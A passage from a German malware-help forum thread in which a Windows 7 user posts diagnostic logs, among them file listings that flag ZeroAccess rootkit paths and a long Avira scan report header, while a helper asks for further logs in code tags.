2015-11-25 21:17 - 2012-07-02 20:24 - 00003822 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-11-25 21:17 - 2011-11-15 16:21 - 00000000 ____D C:\Users\Steffen\AppData\Local\Adobe
2015-11-24 19:10 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2015-11-11 20:22 - 2014-08-08 07:29 - 00000000 ____D C:\ProgramData\Package Cache

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2012-01-17 22:42 - 2012-01-17 22:42 - 0003584 _____ () C:\Users\Steffen\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2012-11-22 10:37 - 2012-11-22 10:37 - 0000000 _____ () C:\ProgramData\cmn_upld.log
2011-11-15 19:06 - 2011-11-15 19:06 - 0000405 _____ () C:\ProgramData\Coinstaller.log
2011-11-16 14:51 - 2012-11-10 14:11 - 0000504 _____ () C:\ProgramData\FastPics.log
2015-01-16 09:31 - 2015-01-16 09:31 - 0000256 _____ () C:\ProgramData\lxea.log
2011-11-15 19:08 - 2012-11-22 10:37 - 0058190 _____ () C:\ProgramData\lxeaJSW.log
2011-11-15 18:59 - 2015-01-16 09:31 - 0241162 _____ () C:\ProgramData\lxeascan.log
2012-11-22 10:37 - 2012-11-22 10:37 - 0000000 _____ () C:\ProgramData\LxWbGwLog.log
2011-11-16 14:47 - 2011-11-16 14:47 - 0000000 _____ () C:\ProgramData\UpdaterLog.txt
2011-03-18 00:04 - 2011-03-18 00:04 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2011-03-17 23:58 - 2011-03-17 23:58 - 0000113 _____ () C:\ProgramData\{34FBC7C4-CD31-4D93-A428-0E524EAC4586}.log
2011-03-18 00:01 - 2011-03-18 00:02 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2011-03-17 23:58 - 2011-03-18 00:01 - 0000106 _____ () C:\ProgramData\{80E158EA-7181-40FE-A701-301CE6BE64AB}.log
2011-03-18 00:02 - 2011-03-18 00:03 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log

ZeroAccess:
C:\Windows\Installer\{2d9ad138-ebfb-785b-bdaf-9765f825eba8}
C:\Windows\Installer\{2d9ad138-ebfb-785b-bdaf-9765f825eba8}\@

ZeroAccess:
C:\Users\Steffen\AppData\Local\{2d9ad138-ebfb-785b-bdaf-9765f825eba8}
C:\Users\Steffen\AppData\Local\{2d9ad138-ebfb-785b-bdaf-9765f825eba8}\@

Einige Dateien in TEMP:
====================
C:\Users\Steffen\AppData\Local\Temp\avgnt.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert
         

Code:
ATTFilter
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 12:26 on 06/12/2015 (Steffen)

Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.

Checking for services/drivers...


-=E.O.F=-
         

Alt 06.12.2015, 14:47   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Hi,

bitte alle Logs von Malwarebytes und Avira in CODE-Tags poste.
__________________

__________________

Alt 06.12.2015, 15:04   #3
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Code:
ATTFilter
Free Antivirus
Erstellungsdatum der Reportdatei: Sonntag, 6. Dezember 2015  08:49


Das Programm läuft als uneingeschränkte Vollversion.
Online-Dienste stehen zur Verfügung.

Lizenznehmer   : Avira Antivirus Free
Seriennummer   : 0000149996-AVHOE-0000001
Plattform      : Windows 7 Home Premium
Windowsversion : (plain)  [6.1.7600]
Boot Modus     : Normal gebootet
Benutzername   : SYSTEM
Computername   : STEFFEN-PC

Versionsinformationen:
build.dat      : 15.0.15.125    93076 Bytes  20.11.2015 15:36:00
AVSCAN.EXE     : 15.0.15.122  1203832 Bytes  01.12.2015 14:04:42
AVSCANRC.DLL   : 15.0.15.106    67688 Bytes  01.12.2015 14:04:42
LUKE.DLL       : 15.0.15.106    69248 Bytes  01.12.2015 14:04:53
AVSCPLR.DLL    : 15.0.15.122   106352 Bytes  01.12.2015 14:04:42
REPAIR.DLL     : 15.0.15.106   493608 Bytes  01.12.2015 14:04:41
repair.rdf     : 1.0.12.86    1389438 Bytes  04.12.2015 17:18:42
AVREG.DLL      : 15.0.15.106   346312 Bytes  01.12.2015 14:04:41
avlode.dll     : 15.0.15.106   701680 Bytes  01.12.2015 14:04:40
avlode.rdf     : 14.0.5.6       84211 Bytes  31.08.2015 10:03:33
XBV00029.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00030.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00031.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00032.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00033.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00034.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00035.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00036.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00037.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00038.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00039.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00040.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00041.VDF   : 8.11.165.190     2048 Bytes  07.08.2014 17:44:12
XBV00232.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00233.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00234.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00235.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00236.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00237.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00238.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00239.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00240.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:52
XBV00241.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00242.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00243.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00244.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00245.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00246.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00247.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00248.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00249.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00250.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00251.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00252.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00253.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00254.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00255.VDF   : 8.12.28.114     2048 Bytes  17.11.2015 21:11:53
XBV00000.VDF   : 7.11.70.0   66736640 Bytes  04.04.2013 06:36:23
XBV00001.VDF   : 7.11.74.226  2201600 Bytes  30.04.2013 19:46:03
XBV00002.VDF   : 7.11.80.60   2751488 Bytes  28.05.2013 11:44:47
XBV00003.VDF   : 7.11.85.214  2162688 Bytes  21.06.2013 20:32:29
XBV00004.VDF   : 7.11.91.176  3903488 Bytes  23.07.2013 18:11:15
XBV00005.VDF   : 7.11.98.186  6822912 Bytes  29.08.2013 16:25:27
XBV00006.VDF   : 7.11.139.38 15708672 Bytes  27.03.2014 18:01:49
XBV00007.VDF   : 7.11.152.100  4193792 Bytes  02.06.2014 07:51:13
XBV00008.VDF   : 8.11.165.192  4251136 Bytes  07.08.2014 17:44:11
XBV00009.VDF   : 8.11.172.30  2094080 Bytes  15.09.2014 19:02:35
XBV00010.VDF   : 8.11.178.32  1581056 Bytes  14.10.2014 13:27:25
XBV00011.VDF   : 8.11.184.50  2178560 Bytes  11.11.2014 15:49:33
XBV00012.VDF   : 8.11.190.32  1876992 Bytes  03.12.2014 07:14:40
XBV00013.VDF   : 8.11.201.28  2973696 Bytes  14.01.2015 19:07:06
XBV00014.VDF   : 8.11.206.252  2695680 Bytes  04.02.2015 06:32:43
XBV00015.VDF   : 8.11.213.84  3175936 Bytes  03.03.2015 07:32:35
XBV00016.VDF   : 8.11.213.176   212480 Bytes  05.03.2015 18:23:00
XBV00017.VDF   : 8.11.219.166  2033664 Bytes  25.03.2015 05:49:19
XBV00018.VDF   : 8.11.225.88  2367488 Bytes  22.04.2015 19:23:12
XBV00019.VDF   : 8.11.230.186  1674752 Bytes  13.05.2015 15:30:17
XBV00020.VDF   : 8.11.237.30  4711936 Bytes  02.06.2015 10:09:43
XBV00021.VDF   : 8.11.243.12  2747904 Bytes  26.06.2015 06:31:39
XBV00022.VDF   : 8.11.248.172  2350592 Bytes  17.07.2015 16:21:34
XBV00023.VDF   : 8.11.254.112  2570752 Bytes  07.08.2015 06:34:04
XBV00024.VDF   : 8.12.3.6     2196480 Bytes  27.08.2015 11:41:20
XBV00025.VDF   : 8.12.8.238   1951232 Bytes  16.09.2015 07:01:46
XBV00026.VDF   : 8.12.16.180  2211328 Bytes  07.10.2015 10:29:29
XBV00027.VDF   : 8.12.21.126  2252288 Bytes  27.10.2015 13:26:19
XBV00028.VDF   : 8.12.28.114  2935296 Bytes  17.11.2015 21:11:46
XBV00042.VDF   : 8.12.28.118    33792 Bytes  17.11.2015 21:11:46
XBV00043.VDF   : 8.12.28.122    39424 Bytes  17.11.2015 18:19:42
XBV00044.VDF   : 8.12.28.124     2048 Bytes  18.11.2015 18:19:42
XBV00045.VDF   : 8.12.28.128    51712 Bytes  18.11.2015 18:19:42
XBV00046.VDF   : 8.12.28.130     2048 Bytes  18.11.2015 18:19:42
XBV00047.VDF   : 8.12.28.132    14336 Bytes  18.11.2015 18:19:43
XBV00048.VDF   : 8.12.28.158    10752 Bytes  18.11.2015 18:19:43
XBV00049.VDF   : 8.12.28.184     5632 Bytes  18.11.2015 18:19:43
XBV00050.VDF   : 8.12.28.210     3584 Bytes  18.11.2015 18:19:43
XBV00051.VDF   : 8.12.28.236    10240 Bytes  18.11.2015 18:19:43
XBV00052.VDF   : 8.12.29.6      27136 Bytes  18.11.2015 18:19:43
XBV00053.VDF   : 8.12.29.8       3072 Bytes  18.11.2015 18:19:43
XBV00054.VDF   : 8.12.29.10     15360 Bytes  18.11.2015 18:19:43
XBV00055.VDF   : 8.12.29.12      2048 Bytes  18.11.2015 18:19:43
XBV00056.VDF   : 8.12.29.14      2048 Bytes  18.11.2015 18:19:43
XBV00057.VDF   : 8.12.29.16     13312 Bytes  18.11.2015 18:19:43
XBV00058.VDF   : 8.12.29.18      2048 Bytes  18.11.2015 18:19:43
XBV00059.VDF   : 8.12.29.20     15360 Bytes  18.11.2015 18:19:43
XBV00060.VDF   : 8.12.29.22      6144 Bytes  18.11.2015 18:19:43
XBV00061.VDF   : 8.12.29.24      6144 Bytes  18.11.2015 18:19:43
XBV00062.VDF   : 8.12.29.26     13312 Bytes  18.11.2015 18:19:43
XBV00063.VDF   : 8.12.29.28     15872 Bytes  18.11.2015 18:19:43
XBV00064.VDF   : 8.12.29.52     39424 Bytes  19.11.2015 18:19:43
XBV00065.VDF   : 8.12.29.72      8192 Bytes  19.11.2015 18:19:43
XBV00066.VDF   : 8.12.29.92     13824 Bytes  19.11.2015 18:19:43
XBV00067.VDF   : 8.12.29.112     2048 Bytes  19.11.2015 18:19:43
XBV00068.VDF   : 8.12.29.156    62464 Bytes  19.11.2015 13:01:01
XBV00069.VDF   : 8.12.29.176     2048 Bytes  19.11.2015 13:01:01
XBV00070.VDF   : 8.12.29.196    17408 Bytes  19.11.2015 13:01:01
XBV00071.VDF   : 8.12.29.198     2048 Bytes  19.11.2015 13:01:01
XBV00072.VDF   : 8.12.29.200     2048 Bytes  19.11.2015 13:01:02
XBV00073.VDF   : 8.12.29.202     2048 Bytes  19.11.2015 13:01:02
XBV00074.VDF   : 8.12.29.204     2048 Bytes  19.11.2015 13:01:02
XBV00075.VDF   : 8.12.29.206    13312 Bytes  19.11.2015 13:01:02
XBV00076.VDF   : 8.12.29.210    37888 Bytes  20.11.2015 13:01:02
XBV00077.VDF   : 8.12.29.212     2048 Bytes  20.11.2015 13:01:02
XBV00078.VDF   : 8.12.29.252     2048 Bytes  20.11.2015 13:01:02
XBV00079.VDF   : 8.12.30.16     27136 Bytes  20.11.2015 13:01:02
XBV00080.VDF   : 8.12.30.56     11776 Bytes  20.11.2015 13:01:02
XBV00081.VDF   : 8.12.30.76     39936 Bytes  20.11.2015 13:01:02
XBV00082.VDF   : 8.12.30.78     17920 Bytes  20.11.2015 13:01:02
XBV00083.VDF   : 8.12.30.80      9728 Bytes  20.11.2015 13:01:02
XBV00084.VDF   : 8.12.30.82     10240 Bytes  20.11.2015 13:01:02
XBV00085.VDF   : 8.12.30.84      8704 Bytes  20.11.2015 13:01:02
XBV00086.VDF   : 8.12.30.86      8192 Bytes  20.11.2015 13:01:02
XBV00087.VDF   : 8.12.30.90     33792 Bytes  21.11.2015 13:01:02
XBV00088.VDF   : 8.12.30.92      2048 Bytes  21.11.2015 13:01:02
XBV00089.VDF   : 8.12.30.94     12288 Bytes  21.11.2015 13:01:02
XBV00090.VDF   : 8.12.30.96     31744 Bytes  21.11.2015 16:58:39
XBV00091.VDF   : 8.12.30.116    89600 Bytes  22.11.2015 16:58:39
XBV00092.VDF   : 8.12.30.178    81920 Bytes  23.11.2015 14:41:58
XBV00093.VDF   : 8.12.30.198     5120 Bytes  23.11.2015 14:41:59
XBV00094.VDF   : 8.12.30.216     7168 Bytes  23.11.2015 14:41:59
XBV00095.VDF   : 8.12.30.218     4096 Bytes  23.11.2015 14:41:59
XBV00096.VDF   : 8.12.30.220     8704 Bytes  23.11.2015 14:41:59
XBV00097.VDF   : 8.12.30.222    12288 Bytes  23.11.2015 14:41:59
XBV00098.VDF   : 8.12.30.224     7168 Bytes  23.11.2015 14:41:59
XBV00099.VDF   : 8.12.30.226     7168 Bytes  23.11.2015 14:41:59
XBV00100.VDF   : 8.12.30.228    10752 Bytes  23.11.2015 14:41:59
XBV00101.VDF   : 8.12.30.246    13824 Bytes  23.11.2015 18:06:23
XBV00102.VDF   : 8.12.31.8       6144 Bytes  23.11.2015 18:06:23
XBV00103.VDF   : 8.12.31.26      5120 Bytes  23.11.2015 18:06:23
XBV00104.VDF   : 8.12.31.44     16384 Bytes  23.11.2015 18:06:23
XBV00105.VDF   : 8.12.31.62      4096 Bytes  23.11.2015 18:06:23
XBV00106.VDF   : 8.12.31.80     10752 Bytes  23.11.2015 18:06:23
XBV00107.VDF   : 8.12.31.82      2048 Bytes  23.11.2015 18:06:23
XBV00108.VDF   : 8.12.31.84      4608 Bytes  23.11.2015 18:06:23
XBV00109.VDF   : 8.12.31.86      8192 Bytes  23.11.2015 18:06:23
XBV00110.VDF   : 8.12.31.90     26624 Bytes  24.11.2015 18:06:23
XBV00111.VDF   : 8.12.31.92      3072 Bytes  24.11.2015 18:06:23
XBV00112.VDF   : 8.12.31.94      2048 Bytes  24.11.2015 18:06:23
XBV00113.VDF   : 8.12.31.96     14336 Bytes  24.11.2015 18:06:23
XBV00114.VDF   : 8.12.31.98      9216 Bytes  24.11.2015 18:06:23
XBV00115.VDF   : 8.12.31.100     6656 Bytes  24.11.2015 18:06:23
XBV00116.VDF   : 8.12.31.102     7168 Bytes  24.11.2015 18:06:23
XBV00117.VDF   : 8.12.31.104     3072 Bytes  24.11.2015 18:06:23
XBV00118.VDF   : 8.12.31.106     8704 Bytes  24.11.2015 18:06:23
XBV00119.VDF   : 8.12.31.108     2048 Bytes  24.11.2015 18:06:23
XBV00120.VDF   : 8.12.31.110     9728 Bytes  24.11.2015 18:06:23
XBV00121.VDF   : 8.12.31.128    10752 Bytes  24.11.2015 20:19:15
XBV00122.VDF   : 8.12.31.130    21504 Bytes  24.11.2015 20:19:15
XBV00123.VDF   : 8.12.31.132     9216 Bytes  24.11.2015 20:19:15
XBV00124.VDF   : 8.12.31.134    15872 Bytes  24.11.2015 20:19:15
XBV00125.VDF   : 8.12.31.140    13824 Bytes  25.11.2015 20:19:15
XBV00126.VDF   : 8.12.31.142     4608 Bytes  25.11.2015 20:19:15
XBV00127.VDF   : 8.12.31.144    23552 Bytes  25.11.2015 20:19:15
XBV00128.VDF   : 8.12.31.146    34816 Bytes  25.11.2015 20:19:15
XBV00129.VDF   : 8.12.31.154    60416 Bytes  25.11.2015 14:08:56
XBV00130.VDF   : 8.12.31.172     7680 Bytes  25.11.2015 14:08:56
XBV00131.VDF   : 8.12.31.188     8192 Bytes  25.11.2015 14:08:57
XBV00132.VDF   : 8.12.31.204     2048 Bytes  25.11.2015 14:08:57
XBV00133.VDF   : 8.12.31.220    12288 Bytes  25.11.2015 14:08:57
XBV00134.VDF   : 8.12.31.224     2048 Bytes  26.11.2015 14:08:57
XBV00135.VDF   : 8.12.31.242    18944 Bytes  26.11.2015 14:08:57
XBV00136.VDF   : 8.12.31.244     2048 Bytes  26.11.2015 14:08:57
XBV00137.VDF   : 8.12.31.246     2048 Bytes  26.11.2015 14:08:57
XBV00138.VDF   : 8.12.31.248    37888 Bytes  26.11.2015 14:08:57
XBV00139.VDF   : 8.12.31.250    11264 Bytes  26.11.2015 14:08:57
XBV00140.VDF   : 8.12.31.252     2048 Bytes  26.11.2015 14:08:57
XBV00141.VDF   : 8.12.31.254     6144 Bytes  26.11.2015 14:08:57
XBV00142.VDF   : 8.12.32.2      12800 Bytes  26.11.2015 15:17:22
XBV00143.VDF   : 8.12.32.4       2560 Bytes  26.11.2015 15:17:23
XBV00144.VDF   : 8.12.32.6      11776 Bytes  26.11.2015 15:17:23
XBV00145.VDF   : 8.12.32.8      17920 Bytes  26.11.2015 15:17:23
XBV00146.VDF   : 8.12.32.10      2048 Bytes  26.11.2015 15:17:23
XBV00147.VDF   : 8.12.32.12      3584 Bytes  27.11.2015 15:17:23
XBV00148.VDF   : 8.12.32.14     69632 Bytes  27.11.2015 15:17:23
XBV00149.VDF   : 8.12.32.30      2048 Bytes  27.11.2015 15:17:23
XBV00150.VDF   : 8.12.32.46      8192 Bytes  27.11.2015 15:17:23
XBV00151.VDF   : 8.12.32.62     12800 Bytes  27.11.2015 20:30:51
XBV00152.VDF   : 8.12.32.78      2048 Bytes  27.11.2015 20:30:52
XBV00153.VDF   : 8.12.32.94     16896 Bytes  27.11.2015 20:30:52
XBV00154.VDF   : 8.12.32.96      5632 Bytes  27.11.2015 20:30:52
XBV00155.VDF   : 8.12.32.98      5120 Bytes  27.11.2015 20:30:52
XBV00156.VDF   : 8.12.32.100    11776 Bytes  27.11.2015 12:13:43
XBV00157.VDF   : 8.12.32.102    13312 Bytes  27.11.2015 12:13:43
XBV00158.VDF   : 8.12.32.104     8704 Bytes  27.11.2015 12:13:43
XBV00159.VDF   : 8.12.32.106     6144 Bytes  27.11.2015 12:13:43
XBV00160.VDF   : 8.12.32.108     2048 Bytes  28.11.2015 12:13:43
XBV00161.VDF   : 8.12.32.112    56832 Bytes  28.11.2015 12:13:43
XBV00162.VDF   : 8.12.32.118     2048 Bytes  28.11.2015 12:13:43
XBV00163.VDF   : 8.12.32.120    16384 Bytes  28.11.2015 14:13:41
XBV00164.VDF   : 8.12.32.138    11264 Bytes  28.11.2015 22:19:45
XBV00165.VDF   : 8.12.32.152     2048 Bytes  28.11.2015 22:19:45
XBV00166.VDF   : 8.12.32.166     7168 Bytes  28.11.2015 12:53:00
XBV00167.VDF   : 8.12.32.180    96768 Bytes  29.11.2015 12:53:01
XBV00168.VDF   : 8.12.32.194     2048 Bytes  29.11.2015 12:53:01
XBV00169.VDF   : 8.12.32.208     6144 Bytes  29.11.2015 12:53:01
XBV00170.VDF   : 8.12.32.222     7168 Bytes  29.11.2015 16:50:35
XBV00171.VDF   : 8.12.32.236     5120 Bytes  29.11.2015 16:50:35
XBV00172.VDF   : 8.12.33.8      55808 Bytes  30.11.2015 13:30:26
XBV00173.VDF   : 8.12.33.24      2048 Bytes  30.11.2015 13:30:26
XBV00174.VDF   : 8.12.33.40      2048 Bytes  30.11.2015 13:30:26
XBV00175.VDF   : 8.12.33.56     20992 Bytes  30.11.2015 13:30:26
XBV00176.VDF   : 8.12.33.70     26112 Bytes  30.11.2015 13:30:26
XBV00177.VDF   : 8.12.33.86     81920 Bytes  30.11.2015 14:04:56
XBV00178.VDF   : 8.12.33.90      2048 Bytes  30.11.2015 14:04:56
XBV00179.VDF   : 8.12.33.92      2048 Bytes  30.11.2015 14:04:56
XBV00180.VDF   : 8.12.33.94      2560 Bytes  30.11.2015 14:04:56
XBV00181.VDF   : 8.12.33.98     44032 Bytes  30.11.2015 14:04:56
XBV00182.VDF   : 8.12.33.102    43520 Bytes  01.12.2015 14:04:56
XBV00183.VDF   : 8.12.33.116     7680 Bytes  01.12.2015 14:04:56
XBV00184.VDF   : 8.12.33.128     2048 Bytes  01.12.2015 14:04:56
XBV00185.VDF   : 8.12.33.140    11776 Bytes  01.12.2015 14:04:56
XBV00186.VDF   : 8.12.33.152     2048 Bytes  01.12.2015 14:04:56
XBV00187.VDF   : 8.12.33.166    28672 Bytes  01.12.2015 21:08:33
XBV00188.VDF   : 8.12.33.168    54272 Bytes  02.12.2015 13:46:57
XBV00189.VDF   : 8.12.33.170     2048 Bytes  02.12.2015 13:46:57
XBV00190.VDF   : 8.12.33.172     2048 Bytes  02.12.2015 13:46:57
XBV00191.VDF   : 8.12.33.174     2048 Bytes  02.12.2015 13:46:57
XBV00192.VDF   : 8.12.33.176    13824 Bytes  02.12.2015 13:46:57
XBV00193.VDF   : 8.12.33.178     2048 Bytes  02.12.2015 13:46:57
XBV00194.VDF   : 8.12.33.184    24576 Bytes  02.12.2015 20:36:19
XBV00195.VDF   : 8.12.33.186     4608 Bytes  02.12.2015 20:36:19
XBV00196.VDF   : 8.12.33.198     3584 Bytes  02.12.2015 20:36:19
XBV00197.VDF   : 8.12.33.210    16384 Bytes  02.12.2015 07:14:35
XBV00198.VDF   : 8.12.33.222    22016 Bytes  02.12.2015 07:14:35
XBV00199.VDF   : 8.12.33.224     2048 Bytes  02.12.2015 07:14:35
XBV00200.VDF   : 8.12.33.236    16896 Bytes  02.12.2015 07:14:35
XBV00201.VDF   : 8.12.33.238     9216 Bytes  02.12.2015 07:14:35
XBV00202.VDF   : 8.12.33.240     6144 Bytes  02.12.2015 07:14:35
XBV00203.VDF   : 8.12.33.242     2048 Bytes  02.12.2015 07:14:35
XBV00204.VDF   : 8.12.33.246    20992 Bytes  03.12.2015 13:22:29
XBV00205.VDF   : 8.12.33.248     2048 Bytes  03.12.2015 13:22:29
XBV00206.VDF   : 8.12.33.250     9728 Bytes  03.12.2015 13:22:30
XBV00207.VDF   : 8.12.33.252    16896 Bytes  03.12.2015 13:22:30
XBV00208.VDF   : 8.12.33.254     6656 Bytes  03.12.2015 13:22:30
XBV00209.VDF   : 8.12.34.0       6656 Bytes  03.12.2015 13:22:30
XBV00210.VDF   : 8.12.34.2      23040 Bytes  03.12.2015 21:49:50
XBV00211.VDF   : 8.12.34.4       2048 Bytes  03.12.2015 21:49:50
XBV00212.VDF   : 8.12.34.6      12800 Bytes  03.12.2015 21:49:50
XBV00213.VDF   : 8.12.34.8      13824 Bytes  03.12.2015 08:19:10
XBV00214.VDF   : 8.12.34.20      2048 Bytes  03.12.2015 08:19:10
XBV00215.VDF   : 8.12.34.30      2048 Bytes  03.12.2015 08:19:10
XBV00216.VDF   : 8.12.34.40     14848 Bytes  04.12.2015 10:50:03
XBV00217.VDF   : 8.12.34.52     17920 Bytes  04.12.2015 10:50:03
XBV00218.VDF   : 8.12.34.54      9216 Bytes  04.12.2015 10:50:04
XBV00219.VDF   : 8.12.34.64      9216 Bytes  04.12.2015 10:50:04
XBV00220.VDF   : 8.12.34.66     20992 Bytes  04.12.2015 10:50:04
XBV00221.VDF   : 8.12.34.68      2048 Bytes  04.12.2015 10:50:04
XBV00222.VDF   : 8.12.34.70     13312 Bytes  04.12.2015 21:17:29
XBV00223.VDF   : 8.12.34.74     35328 Bytes  04.12.2015 21:17:29
XBV00224.VDF   : 8.12.34.76      2048 Bytes  04.12.2015 21:17:29
XBV00225.VDF   : 8.12.34.80     30720 Bytes  04.12.2015 21:17:29
XBV00226.VDF   : 8.12.34.82     12800 Bytes  04.12.2015 06:21:43
XBV00227.VDF   : 8.12.34.92     11264 Bytes  04.12.2015 06:21:43
XBV00228.VDF   : 8.12.34.102     6656 Bytes  04.12.2015 06:21:43
XBV00229.VDF   : 8.12.34.114    38400 Bytes  05.12.2015 13:23:38
XBV00230.VDF   : 8.12.34.124    33792 Bytes  05.12.2015 15:24:00
XBV00231.VDF   : 8.12.34.126     8192 Bytes  05.12.2015 17:23:49
LOCAL001.VDF   : 8.12.34.126 146954240 Bytes  05.12.2015 17:24:12
Engineversion  : 8.3.34.88 
AEBB.DLL       : 8.1.3.0        59296 Bytes  19.11.2015 18:19:39
AECORE.DLL     : 8.3.9.0       249920 Bytes  14.11.2015 12:01:23
AEDROID.DLL    : 8.4.3.348    1800104 Bytes  07.11.2015 13:06:24
AEEMU.DLL      : 8.1.3.6       404328 Bytes  19.11.2015 18:19:39
AEEXP.DLL      : 8.4.2.136     289920 Bytes  04.12.2015 10:50:03
AEGEN.DLL      : 8.1.8.10      491576 Bytes  04.12.2015 10:49:56
AEHELP.DLL     : 8.3.2.6       284584 Bytes  19.11.2015 18:19:39
AEHEUR.DLL     : 8.1.4.2078   9939824 Bytes  04.12.2015 10:50:02
AEMOBILE.DLL   : 8.1.8.10      301936 Bytes  26.11.2015 14:08:56
AEOFFICE.DLL   : 8.3.1.56      408432 Bytes  19.10.2015 20:52:39
AEPACK.DLL     : 8.4.1.20      801920 Bytes  04.12.2015 10:50:03
AERDL.DLL      : 8.2.1.38      813928 Bytes  07.11.2015 13:06:23
AESBX.DLL      : 8.2.21.2     1629032 Bytes  07.11.2015 13:06:24
AESCN.DLL      : 8.3.4.0       141216 Bytes  14.11.2015 12:01:27
AESCRIPT.DLL   : 8.3.0.6       542632 Bytes  04.12.2015 10:50:03
AEVDF.DLL      : 8.3.2.4       141216 Bytes  19.11.2015 18:19:42
AVWINLL.DLL    : 15.0.15.106    28632 Bytes  01.12.2015 14:04:38
AVPREF.DLL     : 15.0.15.106    54896 Bytes  01.12.2015 14:04:41
AVREP.DLL      : 15.0.15.106   225320 Bytes  01.12.2015 14:04:41
AVARKT.DLL     : 15.0.15.106   231032 Bytes  01.12.2015 14:04:38
AVEVTLOG.DLL   : 15.0.15.106   200632 Bytes  01.12.2015 14:04:39
SQLITE3.DLL    : 15.0.15.106   460704 Bytes  01.12.2015 14:04:55
AVSMTP.DLL     : 15.0.15.106    82120 Bytes  01.12.2015 14:04:43
NETNT.DLL      : 15.0.15.106    18792 Bytes  01.12.2015 14:04:53
CommonImageRc.dll: 15.0.15.106  4309752 Bytes  01.12.2015 14:04:38
CommonTextRc.dll: 15.0.15.106    70784 Bytes  01.12.2015 14:04:38

Konfiguration für den aktuellen Suchlauf:
Job Name..............................: AVGuardAsyncScan
Konfigurationsdatei...................: C:\ProgramData\Avira\Antivirus\TEMP\AVGUARD_5663e132\guard_slideup.avp
Protokollierung.......................: standard
Primäre Aktion........................: Reparieren
Sekundäre Aktion......................: Quarantäne
Durchsuche Masterbootsektoren.........: ein
Durchsuche Bootsektoren...............: aus
Durchsuche aktive Programme...........: ein
Durchsuche Registrierung..............: aus
Suche nach Rootkits...................: aus
Integritätsprüfung von Systemdateien..: aus
Prüfe alle Dateien....................: Alle Dateien
Durchsuche Archive....................: ein
Rekursionstiefe einschränken..........: 20
Archiv Smart Extensions...............: ein
Makrovirenheuristik...................: ein
Dateiheuristik........................: Vollständig

Beginn des Suchlaufs: Sonntag, 6. Dezember 2015  08:49

